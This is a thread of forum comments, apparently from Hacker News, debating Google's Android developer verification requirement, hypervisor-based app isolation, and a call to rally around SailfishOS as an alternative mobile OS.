For anything more complex the parallel world still needs to be a full OS that boots up, have display drivers, have touchscreen drivers, text rendering, a network stack, a way to update that software, etc. You end up with a second copy of Android and dual booting, which makes memory pressure intolerable and the devices more expensive. But it's hard to justify that when the base phone OS has become secure enough! It's already multi-tasking and isolating worlds from each other. There are no users outside of HN/Slashdot who would find this arrangement preferable. And as your concern is not fully technical, it's not clear why moving the hardware enforcement around a bit from kernel supervisor to hypervisor would make any difference. This isn't something that can be analyzed technically as it all seems to boil down to fear over the loss of ad blocking.
You have the power to help turn a passionate subset of people away from Android, and now is the best time to do it. Instead of scattering effort into a dozen fragmented experiments, let’s rally around the best bet we have right now: SailfishOS. I'm not at all affiliated with Sailfish, just someone pissed off and am trying to point folks at the most mature alternative out there. I know it has its problems. I know there's even better alternatives that even less people use but seriously, rather than fragment the frustration around android right now, please, just try to rally around a serious legit alternative. We might actually make meaningful change here but it needs focus.
Intro for developers: https://docs.sailfishos.org/Develop/
Getting started guide: https://sailfishos.org/wiki/SailfishOS
Let’s push for something truly independent
No single app has access to any data thanks to hardware-assisted virtualization. Last time a VM escape in the modern Qubes implementation was discovered in 2006 by the Qubes founder: https://en.wikipedia.org/wiki/Blue_Pill_(software).
I could be wrong:
https://developer.android.com/developer-verification
"For student and hobbyist developers
We're committed to keeping Android an open platform for you to learn, experiment, and build for fun. We recognize that your needs are different from commercial developers, so we're working on a separate type of Android Developer Console account for you. We'll share more information in the coming months."
Will "verification" also be required for "hobbyists", otherwise known as computer owners, or "ad targets" in Google's framing of the www. Who knows
Putting restrictions on distributing bad software ("malware") to others is one thing. It makes sense, But putting restrictions on computer owners ("hobbyists") who write, compile and run software on their own computers is another thing entirely
https://grapheneos.org/articles/attestation-compatibility-gu...
There needs to be a point where enough is enough, and locking down devices so that you cannot install programs nor practically use custom operating systems on them anymore is way past that line.
[1]: https://palant.info/2023/01/02/south-koreas-online-security-... [2]: https://ee.kaist.ac.kr/en/research-achieve/in-south-korea-ma...